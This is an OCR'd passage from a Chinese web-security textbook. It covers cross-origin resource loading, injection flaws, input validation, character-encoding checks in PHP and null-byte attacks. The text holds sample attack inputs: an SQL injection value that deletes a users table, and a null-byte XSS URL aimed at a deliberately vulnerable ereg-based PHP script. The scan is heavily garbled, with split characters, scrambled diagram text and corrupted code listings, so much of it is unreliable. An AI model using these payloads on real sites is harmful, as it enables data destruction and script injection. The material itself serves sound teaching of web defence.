img 元 素 的 src 属性 能 够 指定 其 他 域名 。 这 时 ， 请 求 图 像 时 会 附带 图 像 所 在 主机 的 Cookie， 
所 以 就 能 够 让 恶意 网 站 上 的 图 像 显 示 为 “此 图 像 需 要 认证 ”。 
JavaScript 无 法 访问 图 像 文件 内 部 ， 所 以 跨 域 图 像 访问 通常 不 会 造成 什么 问题 。 如 果 不 想 让 
自己 的 图 像 被 贴 到 某 些 特定 网 站 ， 则 可 以 针对 图 像 检 验 Referer 消息 头 。 
过 这 样 会 使 关闭 了 Referer 的 用 户 无 法 看 到 图 像 。 























令 script 元 素 
通过 指定 script 元 素 的 src 属性 就 能 够 从 其 他 网 站 来 读 取 JavaScript。 这 里 假设 A 网 站 读 取 B 
网 站 的 JavaScript， 如 图 3-30 所 示 。 





























中 点 击 劫持 是 综合 利用 iframe 和 CSS 而 执行 的 一 种 被 动 攻击 ， 使 用 视觉 上 的 欺骗 手段 诱 使 用 户 进行 操作 。 


邮 
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图 3-30” 跨 域 读 取 script 























A 网 站 
内 容 
(HTML ) 
全 
<Script 
src='httpVB 网 站 /a.js"> 
</script> 
在 A 网 站 域内 运行 发 给 B 网 站 的 会 话 Cookie 
| B 网 站 
JavaScript( a.js ) Il 


JavaScript 的 源 代码 位 于 B 网 站 的 服务 器 中 ,但 是 JavaScript 被 读 取 后 ， 它 的 作用 范围 就 变 
成 了 读 取 它 的 HTML 所 在 的 A 网 站 。 因 此 ，JavaScript 执行 document .cookie 后 得 到 的 便 是 
A 网 站 上 的 Cookie 信息 。 

A 网 站 向 B 网 站 发 送 取得 JavaScript 的 请 求 时 ， 也 会 同时 向 B 网 站 发 送 Cookie。 因 此 ， 根 据 
用 户 在 B 网 站 中 的 登录 状态 ，B 网 站 的 JavaScript 的 代码 有 可 能 会 发 生变 化 ， 从 而 影响 A 网 站 中 
的 内 容 。 

这 种 情况 也 有 可 能 会 伴随 着 JSONP (JSON with padding ) 而 出 现 。JSONP 是 从 Ajax 应 用 
来 访问 不 同 来 源 的 服务 器 中 的 数据 时 所 采取 的 一 种 方式 ， 但 是 根据 认证 状态 的 不 同 ，JavaScript 
的 代码 (JSONP 的 数据 ) 会 发 生变 化 ， 从 而 就 有 可 能 会 导致 意 想不到 的 信息 泄漏 事故 。 所 以 
JSONP 是 不 能 用 于 传送 隐私 信息 的 。 





























CSS 

CSS ( Cascading Style Sheets ) 能 够 被 跨 域 读 取 。 具 体 来 说 ， 除 了 HTML 的 link 元 素 之 外 ， 
也 能 在 CSS 中 使 用 @import,， 或 者 使 用 JavaScript 的 addImport 方法 。 

一 般 来 说 ， 即 使 读 取 不 良 网 站 的 CSS 也 不 会 造成 问题 。 但 以 前 在 Internet Explorer 中 出 现 过 
叫 作 CSSXSS 的 安全 隐患 0?， 它 能 使 HTML 或 JavaScript 被 当成 CSS 读 取 ， 而 如 果 其 中 部 分 代码 
能 被 执行 的 话 就 会 有 危险。 

由 于 CSSXSS 超出 了 本 书 的 范围 ， 因 此 在 此 不 做 详 述 。 并 且 CSSXSS 属于 浏览 右 的 漏洞 ,无 
关 应 用 程序 ， 所 以 只 需要 提醒 网 站 用 户 使 用 最 新 的 浏览 器 ( 如 下 8 )， 并 安装 官方 的 安全 补丁 即 可 。 




















令 form 元 素 的 action 属性 
form 元 素 的 action 属性 也 能 够 跨 域 指定 。 而 且 无 论 action 的 目标 是 否 跨 域 ，form 的 提交 都 
能 通过 JavaScript 来 操作 。 











DD http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4089 
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恶意 利用 form 元 素 的 特性 来 实施 攻击 的 方式 被 称 为 跨 站 请 求 伪造 ( CSRF )。CSRF 攻击 是 让 
用 户 在 不 知情 的 情况 下 提交 form， 从 而 肆意 使 用 应 用 中 的 功能 。 关 于 CSRF 会 在 4.5 节 详 述 。 





总 结 


本 节 讲 述 了 被 动 攻击 ， 以 及 浏览 器 用 来 防御 被 动 攻击 的 同 源 策 略 。 

被 动 攻击 是 攻击 Web 应 用 的 一 种 手法 ,经 由 用 户 的 浏览 带 来 攻击 Web 应 用 程序 。 

JavaScript 的 同 源 策略 是 浏览 器 防御 被 动 攻 击 的 代表 性 对 策 。 然 而 ， 若 浏览 器 或 Web 应 用 中 
存在 安全 隐患 ， 攻 击 者 就 可 以 绕 过 同 源 策略 而 执行 攻击 。 下 一 章 我 们 就 将 重点 讲述 Web 应 用 方 
面 的 防御 对 策 。 


























Web 应 用 的 
各 种 安 全 隐患 


本 章 将 详细 讲解 Web 应 用 中 各 种 安全 隐患 的 产生 原理 、 景 
响 范 围 和 防范 策略 。 

4.1 节 讲 述 Web 应 用 中 功能 与 安全 隐患 的 对 应 关系 ， 从 而 

使 读者 对 安全 隐患 有 一 个 整体 印象 。 

4.2 节 讲 述 Web 应 用 的 “输入 ”以 及 与 其 相关 的 安全 隐患 。 

4.3 节 以 后 将 分 门 别 类 地 详细 剖析 Web 应 用 的 每 个 功能 容 
易 滋 生 的 安全 隐患 。 其 中 ， 一 些 影 响 重 大 的 知名 隐患 ， 如 
跨 站 脚本 ( XSS ) 与 SQL 注入 等 也 都 将 在 此 进行 讲述 。 
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4.1 Web 应 用 的 功能 与 安全 隐患 的 对 应 关系 


安全 隐患 产生 于 何 处 





在 逐 项 细 述 Web 应 用 的 安全 隐患 之 前 ， 让 我 们 先 对 安全 隐患 有 一 个 整体 认识 。 图 4-1 展示 
了 Web 应 用 的 各 项 功能 与 安全 隐患 的 对 应 关系 。 图 中 使 用 经 典 的 “输入 -处理 -输出 ”模型 来 


表示 Web 应 用 。 从 HTTP 请 求 的 输入 开 妇 
而 除了 HTTP 响应 外 ， 此 处 的 “输出 ”还 包括 访问 数据 库 、 读 写 文件 、 收 发 邮件 等 “ 


流 ” 的 操作 。 


人 
口 ， 经 


4-1 Web 应 用 的 功能 与 安全 隐患 的 对 应 关系 






























































输入 处理 输出 
页 面 显 万 
/HTML 
DB/SOL 
外。 | 外 部 命令 
输 邮件 
HTTP 
浏览 器 < 从 | | 
| 村 文件 
关键 处 理 
认证 
授权 

















换 一 个 角度 来 看 ， 图 4-1 中 的 “输出 ”也 能 被 到 


HTTP 
响应 


脚本 输出 和 与 其 对 应 的 安全 隐患 如 下 所 示 。 


输出 HTML ( 跨 站 脚本 ) 

输 ! 

用 SQL 语句 (SQL 注入 ) 

用 Shell 命令 (OS 命令 注入 ) 
偷 出 邮件 头 和 正文 (邮件 头 注 入 ) 


= Ce 
| 








关于 各 隐患 的 详情 在 后 面 的 章节 中 会 
处理 过 程 与 输出 过 程 会 产生 安全 隐患 








b HTTP 消息 头 (HTTP 消息 头 注入 ) 


进行 细 述 ， 而 从 图 4-1 中 ， 我 们 可 以 





关系 型 数据 库 SS 











安全 隐患 的 类 型 





太 六 上 且 | 














Shell OS 命令 注入 


邮件 邮件 头 注入 





文件 路 径 遍历 


SR 











会 话 固定 
认证 漏洞 

















授权 漏洞 

















过 应 用 的 各 种 处 理 ， 最 后 由 HTTP 响应 进行 输出 。 


与 外 界 交 





启 露 沙 冲 全 证 也 而 迪 E 塘 





亢 注 峭 亲人 于 上 几 飞 机 岂 章 六 





E 解 为 向 外 部 媒介 输出 脚本 。Web 应 用 常见 的 


以 下 结论 。 
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输入 过 程 不 会 产生 安全 隐患 ” 
输出 过 程 产生 的 安全 隐患 的 名 称 中 多 数 都 带 有 “注入 ” 


其 实 ， 跨 站 脚本 有 时 也 被 称 为 “HTML 注入 ”或 “JavaScript 注入 ”， 因 此 ， 图 4-1 中 输出 过 
程 产生 的 安全 隐患 全 部 为 注入 型 隐患 。 

综 上 所 述 ， 安 全 隐患 和 Web 应 用 的 功能 息息相关 。 所 以 在 程序 设计 或 编写 代码 时 ， 就 能 够 
根据 此 时 正在 实现 的 功能 而 得 知 应 当 对 哪些 安全 隐患 提高 警惕 。 鉴 于 这 种 情况 ， 下 一 节 开 始 , 我 
们 将 按照 Web 应 用 的 各 项 功能 分 类 ， 来 详细 阐述 与 其 对 应 的 安全 隐患 。 

由 于 所 有 的 注入 型 隐患 都 是 基于 一 些 共 同 的 原理 ， 因 此 ， 接 下 来 就 让 我 们 首先 来 看 一 下 注入 
型 隐患 产生 的 原因 。 





























注入 型 隐患 
Web 应 用 中 传递 的 信息 多 数 为 文本 格式 。HTML 、HTTP 和 SQL 等 支撑 Web 应 用 的 技术 多 
数 都 采用 了 文本 格式 的 接口 。 
这 些 文本 格式 都 由 各 自 的 语法 构成 ， 其 中 还 混合 了 命令 、 运 算 符 和 数据 等 。 多 数 情况 下 ， 数 
据 部 分 会 通过 使 用 引号 ( 单 引号 或 双 引 号 ) 或 使 用 被 称 为 分 隔 符 (Delimiter ) 的 符号 (逗号 、Tab 
或 换行 符 等 ) 隔 开 的 方式 来 加 以 区 分 。Web 应 用 的 普遍 形式 为 ， 首 先 确 定 文本 的 框架 结构 ， 然 后 
再 将 数据 填 和 人 其 中 。 例 如， 以 下 的 SQL 语句 中 ，$iq 就 是 被 填 人 的 数据 。 


























SELECT * FROM users WHERE id='$id' 











$id 以 外 的 部 分 即 事先 确定 的 文本 结构 。 然 而 ， 如 果 应 用 存在 安全 隐患 ， 就 能 够 更 改 此 
SQL 语句 的 结构 。 
举例 来 说 ,假设 要 将 以 下 字符 串 作为 $id 的 值 填 和 人 SQL 语句 。 





17DELETE FROM users -- 





填 和 人 数据 后 的 SQL 语句 如 下 。 阴 影 部 分 即 $ia 的 值 。 








SELECT * FROM users WHERE id='';DELETE FROM users --! 








外 界 传人 的 单 引 号 和 分 号 迫使 SELECT 语句 结束 后 ， 又 被 添加 了 DELETE FROM 语句 ， 这 
就 是 SQL 注入 攻击 ， 详 情 将 在 4.4.1 节 讲 述 。 
SQL 注入 攻击 产生 的 原因 为 ， 在 被 认定 为 “数据 ”的 位 置 插入 单 引 号 使 得 数据 部 分 结 











QD 仅 限 于 本 书 探讨 的 应 用 程序 的 安全 性 。 如 果 将 讨论 范围 扩大 至 中 间 件 (Middleware )， 输 入 校 验 时 也 有 可 能 引入 安全 
隐患 。 
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从 而 更 改 了 SQL 语句 的 构造 。 

这 个 原理 同样 也 适用 于 其 他 的 注入 型 隐患 。 通 过 搬入 引号 或 分 隔 符 等 用 于 表示 “数据 部 分 边 
界 ” 的 字符 ， 从 而 改变 了 文本 的 结构 。 

表 4-1 列举 了 各 种 注入 型 攻击 采用 的 恶意 手段 和 表示 “数据 部 分 边界 ”的 字符 。 详 情 在 之 后 
介绍 各 个 隐患 时 会 进行 细 述 ， 此 处 首先 对 注入 型 隐患 的 产生 有 着 共同 的 原理 这 一 事实 有 一 大 致 印 
象 ， 将 有 助 于 理解 后 面 章节 的 内 容 。 


表 4-1 注入 型 隐患 的 比较 


































































































隐患 名 接口 恶意 手段 数据 部 分 边界 
压 站 脚本 HTML 注入 JavaScript 等 < "等 ” 
HTTP 消息 头 注入 HTTP 注入 HTTP 响应 消息 头 换行 符 
SOL 注入 SOL 注入 SOL 命令 ' 等 
OS 命令 注入 Shell 脚本 注入 系统 命令 ;| 等 
邮件 头 注 入 sendmail 命令 注入 或 更 改 邮件 头 或 正文 换行 符 
总 结 











本 节 作 为 讲解 安全 隐患 的 序幕 ， 介 绍 了 安全 隐患 产生 地 点 和 安全 隐患 种 类 的 关联 性 。 此 外 ， 
对 由 输出 引发 的 安全 隐患 ， 即 注入 型 隐患 的 产生 原理 也 进行 了 介绍 。 

下 一 节 开始 ,我 们 将 把 Web 应 用 以 功能 为 单位 进行 细 分 ， 并 详细 讲解 每 一 功能 容易 产生 的 
安全 隐患。 




















四 之 所 以 将 “<” 作 为 数据 部 分 的 边界 ， 是 因为 HTML 元 素 的 内 容 ( 一般 为 文本 ) 以 “<” 为 结束 符 ,“<” 表 示 标 签 
的 开始 。 
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4.2 输入 处 理 与 安全 性 


本 节 专 门 讨论 Web 应 用 中 对 “输入 值 ”的 处 理 ， 以 及 输入 处 理 在 安全 性 策略 中 的 地 位 。 虽 
然 校 验 输 入 值 本 身 并 不 是 安全 性 策略 ， 但 是 ,在 安全 性 对 策 存 在 缺陷 的 情况 下 ， 通 过 校 验 输入 值 
能 够 防止 危害 的 发 生 ， 或 者 减轻 损害 的 程度 。 


























什么 是 Web 应 用 的 输入 处 理 
Web 应 用 中 的 输入 即 由 HTTP 请 求 传 入 的 信息 ， 比 如 GET、POST、Cookie 等 。Web 应 用 
接收 到 这 些 值 时 所 做 的 处 理 ， 在 本 书 中 称 为 “输入 处 理 ”。 以 图 4-2 所 示 的 “输入 - 处 理 - 输 出” 
模型 为 例 ， 在 这 一 模型 中 ，Web 应 用 的 输入 处 理 即 为 业务 逻辑 处 理 之 前 的 数据 准备 阶段 。 
图 4-2 “和 输入 -处理 -输出 ”模型 
HTTP 请 求 








输入 
处 理 
( 应 用 业务 逻辑 ) 


输出 









































HTTP 响应 
输入 处 理 就 是 指 对 输入 值 做 如 下 处 理 。 
(a ) 检验 字符 编码 的 有 效 性 ? 








(b ) 必要 时 转换 字符 编码 
(c ) 检验 参数 字符 串 的 有 效 性 
之 所 以 检验 字符 编码 的 有 效 性 是 因为 存在 利用 字符 编码 的 攻击 手段 ”( 参考 第 6 章 ),。 虽然 理 


























论 上 只 要 确保 所 有 使 用 字符 串 的 地 方 都 能 正确 处 理 字 符 编码 就 不 会 有 问题 ， 但 现实 中 由 于 编程 语 
言 的 漏洞 或 者 写 代 码 时 的 疏忽 ， 安 全 隐患 却 防不胜防 。 而 另 一 方面 ， 如 果 Web 应 用 能 够 将 字符 
编码 不 正确 的 数据 拒 之 门 外 ， 就 能 抵御 利用 非法 字符 编码 发 动 的 攻击 。 
(b ) 处 理 中 的 转换 字符 编码 ， 指 的 是 在 HTTP 消息 与 程序 内 部 使 用 的 字符 编码 不 一 致 的 情况 
下 需要 进行 的 处 理 。 
(c) 处 理 中 的 校 验 输入 值 ， 与 其 说 是 安全 性 方面 的 要 求 ， 不 如 说 是 依据 应 用 软件 规格 执行 的 


四 ”本章 不 深入 讲解 字符 编码 。 详 情 请 参考 第 6 章 。 
@ 此外， 因为 程序 的 正常 运行 也 要 求 字 符 编码 没有 问题 ， 所 以 检验 字符 编码 有 效 性 也 是 为 了 保证 程序 的 正常 运行 。 
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操作 ， 但 不 管 怎样 ， 从 结果 上 来 看 确实 对 提升 应 用 的 安全 性 起 到 了 辅助 作用 。 
下 面 让 我 们 来 分 别 看 一 下 上 述 3 点 的 详细 内 容 。 








检验 字符 编码 
PHP 中 能 使 用 mpb_check_encoding 函数 检验 字符 编码 。 
格式 清单 ”mb_check_encoding 函数 


boeolmblenecekeeneodnme(S eng ver Seno enc 





第 一 个 参数 svar 是 检验 对 象 字 符 串 ， 第 二 个 参数 Sencoding 是 字符 编码 。$encoding 可 以 
省 略 ， 省 略 时 函数 使 用 PHP 的 内 部 字符 编码 。 如 果 $var 字符 串 的 字符 编码 正确 则 也 数 返回 true。 
其 他 编程 语言 中 检验 字符 编码 的 方法 请 参考 第 6 章 。 





























转换 字符 编码 
转换 字符 编码 的 方法 因 编 程 语言 而 异 。 总 体 上 可 分 为 自动 转换 字符 编码 的 语言 和 在 脚本 中 手 
动 转换 字符 编码 的 语言 。PHP 中 通过 设置 php.ini 文件 ， 可 切换 上 述 两 种 方式 。 


表 4-2 主流 Web 开发 语言 中 提供 的 转换 字符 编码 的 方法 



































语言 自动 转换 手动 转换 
PHP php.ini 等 mb_convert_encoding 
Perl X Encode::decode 
Java setCharacterEncoding String 类 
ASP.NET Web.config 4 











表 4-2 中 归纳 了 主流 Web 开发 语言 中 提供 的 转换 字符 编码 的 方法 。 接 下 来 、 让 我 们 以 手动 














转换 字符 编码 的 方式 为 例 进 行 说 明 。 
PHP 中 使 用 mb_convert_encoding 国 数 来 手动 转换 字符 编码 。 























格式 清单 ”mb_convert_encoding 函数 


serine mdeonvertencodmne(S me in toon in romeneodne) 


mb_convert_encoding 函数 的 3 个 参数 分 别 为 : 转换 前 的 字符 串 、 转 换 后 的 字符 编码 、 
转换 前 的 字符 编码 。 返 回 值 为 转换 后 的 字符 串 。 








检验 并 转换 字符 编码 的 实例 
这 里 我 们 来 看 一 个 检验 并 转换 字符 编码 的 实例 。 以 下 PHP 脚本 表示 的 是 接收 Shift_JIS 编码 
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的 文字 列 name 后 将 其 显示 在 页 面 上 。 脚 本 的 内 部 编码 为 UTF-8， 所 以 需要 使 用 mb_convert_ 
encoding 困 数 来 转换 文字 编码 。 


代码 清单 ”/42/42-001.php 





<?php 
Sname = isset($ GET['name']) ? $ GET['name'] : ''; 
// 校 验 字符 编码 ( shift_JIS ) 
if (! mb check encoding($name, 'Shift JIS')) { 
die (' 字符 编码 有 误 ' ) ; 


// 转换 字符 编码 ( shift_JIS 一 UTF-8) 

$name = mb_convert encoding ($name, 'UTF-8', 'Shift JIS'); 
2 
<body> 


名 字 为 <?php echo htmlspecialchars ($name, ENT NOQUOTES, 'UTF-8'); 


EF 
</body> 














正常 情况 下 执行 结果 如 图 4-3 所 示 。 


4-3 42-001.php 执行 结果 示例 ( 正常 情况 ) 
| 息 httpy/examplejp/42/42-001.php?name= 山 田 - Windows Internet Explorer | 是 | % 


(ARDS Be] http://examplejp/42/42-001.php?name= 山 田 ~| 池 |X| 辐 src 2 | 











次 收藏 夫 看 http:;//examplejp/42/42-001.php?name= 山 田 [| 


名 字 是 山田 




















下 图 为 使 用 不 符合 Shift_JIS 编码 的 字符 串 %82%21 时 的 页 面 显示 。 由 于 Shift_JIS 双 字 节 的 
第 二 个 字 节 必须 是 0x40 以 上 的 值 ， 而 %20 不 符合 要 求 ， 所 以 是 无 效 的 Shift_ JIS 数据 。 相 关 详 情 
可 参考 第 6 章 。 





图 4-4 ”输入 值 不 符合 Shift_JIS 编码 








FE 
看 http://examplejp/42/42-001.php?name=%82%21 - Windows Internet Explorer | | bg 
bd 回 http://example;jp/42/42-001.php?name=%829621 -| 只 | XxX | Bing 也 "| 








高 收藏 夫 ” 息 http://examplejp/42/42-001.php?name=%8... 


字符 编码 不 正确 
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专栏 : 字符 编码 的 自动 转换 与 安全 性 COLUMN 
前 面 提 到 PHP 中 能 通过 编辑 php.ini 使 字符 编码 自动 转换 。 其 实 ， 也 有 些 编程 语言 ， 如 Java 
与 .NET， 主 要 使 用 自动 转换 字符 编码 。 

转换 字符 编码 时 ， 不 了 
U+FFFD )， 医 


虽然 使 



























































MA 























E 确 的 字符 会 被 删除 或 被 替换 为 其 他 字符 ( ? 或 者 Unicode 的 替换 字符 
此 ， 即 便 是 自动 转换 字符 ， 也 能 够 防御 利用 字符 编码 的 攻击 手段 。 

自动 转换 能 让 写 代 码 的 工程 轻松 不 少 ， 但 也 存在 以 下 缺点 。 
户 没有 注意 到 程序 内 部 出 现 了 文字 乱码 而 继续 操作 
迁移 服务 器 等 导致 pnp.ini 文件 被 改变 后 ， 会 有 丢失 校 验 操作 的 风险 
此 ， 本 书 专门 介绍 了 检验 字符 编码 和 手动 转换 字符 编码 的 方法 。 
至 于 如 何 选择 自动 转换 与 手动 转换 ， 需 要 在 了 解 两 者 各 自 
成 统一 认识 ， 或 者 在 进行 各 个 项 


















































































































































省 






































的 优 缺 点 的 前 提 下 ， 在 开发 团队 中 达 


























目 时 分 别 选 择 。 
输入 校 验 
处 理 完 字 符 


编码 的 相关 操作 后 ， 就 进入 到 了 输入 校 验 的 阶段 。 下 面 ， 让 我 们 首先 了 解 一 下 
Web 应 用 中 输入 校 验 的 概要 ， 并 在 此 基础 上 探讨 输入 校 验 与 安全 怕 


FE 的 关系 。 
令 输 入 校 验 的 目的 








为 了 理解 输入 校 验 的 目的 ， 我们 首先 来 看 一 下 没有 对 输入 值 进 行 校 验 的 Web 应 用 的 情况 。 
如 果 Web 应 用 没有 对 输入 值 进行 校 验 的 话 ， 或 许 就 会 出 现 以 下 现象 。 











用 户 在 只 接受 数值 的 项 目 中 填 人 了 字母 或 标点 符号 ， 导 致 保存 至 数据 库 时 发 生 错误 
更 新 处 理 时 中 途 发 生 错 误 ， 导 致 数据 库 的 不 一 致 性 
用 户 填写 完 很 多 项 目 后 点 击 确认 按钮 时 因 发 生 了 内 部 错误 而 不 得 不 全 部 重新 填写 
程序 在 用 户 漏 填 邮 箱 地 址 的 情况 下 依然 执行 发 送 邮件 的 处 理 
像 这样 ， 不 校 验 输 入 值 会 导致 应 用 程序 内 部 业务 逻辑 在 中 途 发 生 错误 ， 以 及 乍 一 看 似乎 很 正 
常 ， 但 相关 操作 在 后 台 其 实 根本 没有 被 处 理 ， 或 者 没有 被 处 理 完 等 问题 。 
而 输入 校 验 就 是 为 了 减少 此 类 事故 的 发 生 。 然 而 ， 输 入 校 验 说 到 底 也 只 是 对 字符 串 的 格式 进 
行 检查 ,格式 以 外 的 其 他 条 件 ( 如 是 否 还 有 库存 ， 账 户 余额 是 否 充足 等 ) 则 并 不 









































会 得 到 检验 。 
此 ， 答 入校 验 并 不 能 消灭 所 有 的 错误 ， 但 是 通过 尽早 通 知 用 户 输入 存在 不 妥 并 让 其 改正 ， 可 以 使 
应 用 的 易 有 








日 性 得 到 提高 。 
综 上 ， 输 入 校 验 的 目的 可 以 被 总 结 如 下 。 


尽早 发 现 输入 错误 并 提示 用 户 重新 输入 ， 提 高 了 易 用 性 
防止 错误 处 理 造成 数据 不 一 致 等 ， 提 高 了 系统 的 可 靠 性 
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4 输入 校 验 与 安全 性 
虽然 输入 校 验 的 主要 目的 并 不 是 安全 性 ， 但 有 时 却 也 能 对 提高 应 用 的 安全 性 大 有 神 益 。 例 如 
以 下 情况 。 
在 有 些 参数 忘 了 防范 SQL 注入 攻 击 的 情况 下 ， 因 为 输入 检验 时 只 允许 字母 和 数字 ， 所 以 
就 能 避免 损害 
在 PHP 中 使 用 了 非 二 进 制 安全 的 函数 ( 稍 后 讲述 ) 的 情况 下 ， 因 为 输入 校 验 时 过 小 了 控制 
字符 ， 所 以 就 能 避免 损害 
在 页 面 显示 处 理 函 数 中 对 字符 编码 的 指定 有 所 芷 忽 时 ， 因 为 输入 校 验 时 检验 了 字符 编码 的 
有 效 性 ， 所 以 就 能 避免 损 害 


多 二 进 制 安全 与 空 字 节 攻击 

刚才 出 现 了 “二 进 制 安全 ”这 个 用 语 。 二 进 制 安全 是 指 ， 不 管 输入 值 是 怎样 的 字 节 列 都 能 将 
其 原封 不 动 地 进行 处 理 的 功能 ， 特 别 是 当 包 含 零 值 字 节 (NULL 字 节 ，PHP 中 记 为 \0 ) 时 也 能 正 
确 处 理 。 

空 字 节 之 所 以 特殊 ， 是 因为 在 C 语言 以 及 Unix 与 Windows 的 API 中 规定 空 字 节 为 字符 串 的 
结尾 。 因 此 ， 底 层 为 C 语言 的 PHP 以 及 其 他 脚本 语言 中 ， 有 些 函 数 不 能 正确 处 理 空 字 节 。 而 这 
类 函数 就 被 称 为 不 是 二 进 制 安全 的 函数 。 

利用 空 字 节 的 攻击 手段 被 称 为 空 字 节 攻 击 。 空 字 节 攻击 本 身 并 不 造成 伤害 ， 而 是 通常 被 用 
绕 过 其 他 安全 隐患 的 防范 策略 。 

以 下 为 没有 进行 空 字 节 攻击 防范 的 范例 脚本 。42-002.php 使 用 正则 表达 式 ereg 检验 变 
量 $p 的 值 中 仅 包含 数字 。 


代码 清单 ”/42/42-002.php 
























































oh 





<body> 
<?php 
SP = $_GET['p']; 
if (ereg('^[0-9]+$', S$p) === FALSE) { 


die(' 请 输入 整数 值 ' ) ; 
} 
echo sp; 
a 


</body> 











$p 只 包含 数字 的 情况 下 ， 页 面 显示 应 该 一 切 正 常 。 接 下 来 ,我 们 来 尝试 用 如 下 URL 来 执行 
42-002.php。 


Q 详情 可 参考 后 续 章节 中 对 跨 站 脚本 和 SQL 注入 的 讲解 ， 以 及 第 6 章 。 
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http://example.jp/42/42-002.php?p=1%00<script>alert ('XSS')</script> 











运行 结果 如 图 4-5 所 示 。 


4-5” 绕 过 ereg 检验 的 安全 隐患 


克 http://example.jp/42/42-002.php?p=19600<script>alert(XS5")</script> - Windo... [号 | 加 | 避 








[€) Sy | 加 http://example,jp/42/42-002.php?p=1%00<script> alert( X55'")</script> 








J A ~ 辣 Windows Internet Expl... We 
WW I dhttp://example, jp/42/42-002,php?p=1%00,,, | 





， xss 
也 


























浏览 器 中 执行 了 JavaScript 代码 ， 弹 出 “XsSS” 的 对 话 框 ， 这 就 是 跨 站 脚本 漏洞 (XSS ), 具 
体内 容 将 在 4.3 节 中 详 述 ， 但 在 此 也 可 以 看 出 使 用 ereg 的 检验 是 能 被 绕 过 的 。 
9 ereg 检验 被 绕 过 的 原因 

ereg 检验 被 绕 过 的 原因 是 URL 中 含有 %00。%00 就 是 空 字 节 ， 由 于 ereg 函数 不 是 二 进 
制 安全 的 函数 ， 因 此 ， 检 验 对 象 字符 串 中 如 果 含 有 空 字 节 ， 就 会 被 视 作 字符 串 的 结束 (网 4-6 )。 


4-6 ” 空 字 节 攻 击 














字符 mye r i 中 避 
字符 的 值 | 31 | 00 | 3c | 73 | 63 | 72 | 69 | 70|74| 3e 















































V 
被 视 作 字符 串 的 结束 符 空 字符 以 后 没有 被 检验 


由 于 <script>… 以 后 的 字符 时 被 检验 函数 忽略 ， 检 验 对 象 字符 串 变 成 了 “1 ， 满 足 “ 仅 限 
数字 ”的 要 求 ， 因 此 便 通 过 了 检验 。 而 JavaScript 得 以 被 执行 的 原因 也 就 是 如 此 。 

前 面 已 经 说 过 ， 空 字 节 攻击 很 少 能 独自 造成 损害 ， 而 是 通常 被 用 来 在 其 他 安全 隐患 防范 
策略 的 玻 漏 中 见缝插针 。 而 除了 XSS 外 ， 常 与 空 字 节 攻击 组 合 使 用 的 还 有 目录 遍历 攻击 (参考 
4.10.1 节 )。 

虽然 在 应 用 中 全 部 使 用 二 进 制 安全 的 函数 就 能 完全 防御 空 字 节 攻击 ， 但 实际 实现 起 来 却 颇 为 
困难 。 因 为 很 多 情况 下 函数 的 参考 文档 中 都 没有 明确 记载 该 函数 是 否 二 进 制 安 全 。 因 此 , 行 之 有 
效 的 策略 为 ， 在 应 用 程序 的 入 口 处 使 用 二 进 制 安全 的 函数 检验 输入 值 中 是 否 有 空 字 节 ， 如 果 含 有 
空 字 节 就 报错 。 


令 仅 校 验 输入 值 并 不 是 安全 性 策略 
至 此 ， 读 者 们 或 许 会 产生 以 下 疑问 : 如 果 在 输入 阶段 就 将 所 有 的 非法 输入 值 过 滤 掉 ， 是 不 
是 就 能 确保 应 用 的 安全 性 了 呢 ? 而 且 在 输入 阶段 就 将 安全 隐患 全 部 搞定 的 话 ， 之 后 的 工作 也 更 
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轻松 了 呢 。 

但 遗憾 的 是 这 并 不 可 行 。 因 为 输入 阶段 实施 的 校 验 并 不 能 成 为 安全 隐患 的 防范 策略 。 输 入 
校 验 是 根据 应 用 程序 的 软件 规格 而 实施 的 操作 。 例 如 ,假设 规格 书 中 规定 允许 输入 任何 字符 ， 那 
么 ， 在 输入 阶段 就 无 法 进行 任何 安全 性 防范 措施 。 

因此 ， 输 入校 验 的 作用 最 多 也 就 是 为 安全 机 制 多 加 一 层 保障 。 


令 输入 校 验 的 依据 是 应 用 程序 的 规格 
输入 校 验 时 的 基准 是 应 用 程序 的 规格 。 例 如 电话 号 码 应 该 全 部 是 数字 、 用 户 ID 应 该 是 8 位 
的 字母 或 数字 等 ， 各 参数 允许 的 字符 种 类 以 及 长 度 都 应 根据 应 用 的 要 求 规格 进行 设置 。 




















仿 校 验 控 制 字符 

刚才 已 经 提 到 输入 校 验 的 基准 是 应 用 程序 的 规格 ,但 为 了 在 应 用 的 规格 中 规定 “允许 输入 任 
何 字符 ”的 情况 下 也 能 够 进行 验证 ， 就 需要 校 验 控制 字符 。 

控制 字符 是 指 ， 换 行 符 (CR 和 LF) 和 Tab 等 通常 不 显示 在 页 面 上 的 、ASCI 编码 中 0x20 以 下 
以 及 0x7F (DELETE ) 的 字符 。 前 面 讲 到 的 空 字 节 也 是 控制 字符 。 由 于 Web 应 用 中 的 输入 参数 多 
为 文本 格式 ， 所 以 应 当 限 制 控制 字符 的 输入 ， 然 而 也 有 一 些 Web 应 用 未 对 控制 字符 进行 处 理 。 

单行 的 文本 输入 框 (input 要 素 的 type 属性 值 为 text 或 password ) 中 ， 由 于 按 常规 的 输入 方 
法 无 法 输入 控制 字符 ， 因 此 多 数 情况 下 所 有 的 控制 字符 都 会 遭 到 拒绝 。textarea 元 素 中 能 够 输入 
换行 和 Tab, 但 是 否 允 许 Tab 则 要 由 规格 决定 。 




































































信 校 验 字 符 数 

应 用 程序 的 规格 文档 中 应 当 明 确定 义 所 有 输入 项 目的 最 大 字符 数 。 如 果 是 要 保存 到 数据 库 
的 值 ， 最 大 字符 数理 应 与 表 字 段 的 最 大 字符 数 一 致 。 而 即使 有 些 输入 项 目 没有 物理 上 的 上 限 值 限 
制 ， 为 了 保证 程序 的 正常 运行 ， 也 同样 需要 确定 最 大 字符 数 。 

某 些 情况 下 ， 校 验 最 大 字符 数 能 使 应 用 的 安全 性 更 为 稳固 。 由 于 攻击 Web 应 用 有 时 需要 用 
到 很 长 的 字符 串 ， 因 此 ,假设 限制 字符 串 的 最 大 长 度 为 10 的 话 ， 那 么 就 能 使 攻击 者 在 发 现 SQL 
注入 隐患 时 也 无 法 实施 攻击 。 虽 然 我 们 不 能 对 校 验 字符 数 的 效果 抱 有 过 多 期 待 ， 但 也 应 该 认识 到 
校 验 字 符 数 的 必要 性 以 及 其 对 安全 性 的 帮助 。 
































人 哪些 参数 需要 校 验 

输入 校 验 的 对 象 为 所 有 的 参数 。hidden 参数 、 单 选 框 、select 元 素 等 也 不 例外 。Cookie 中 包 
含 会 话 ID 以 外 的 值 的 情况 下 ，Cookie 值 也 是 校 验 对 象 。 此 外 ， 应 用 中 用 到 了 Referer 等 HTTP 
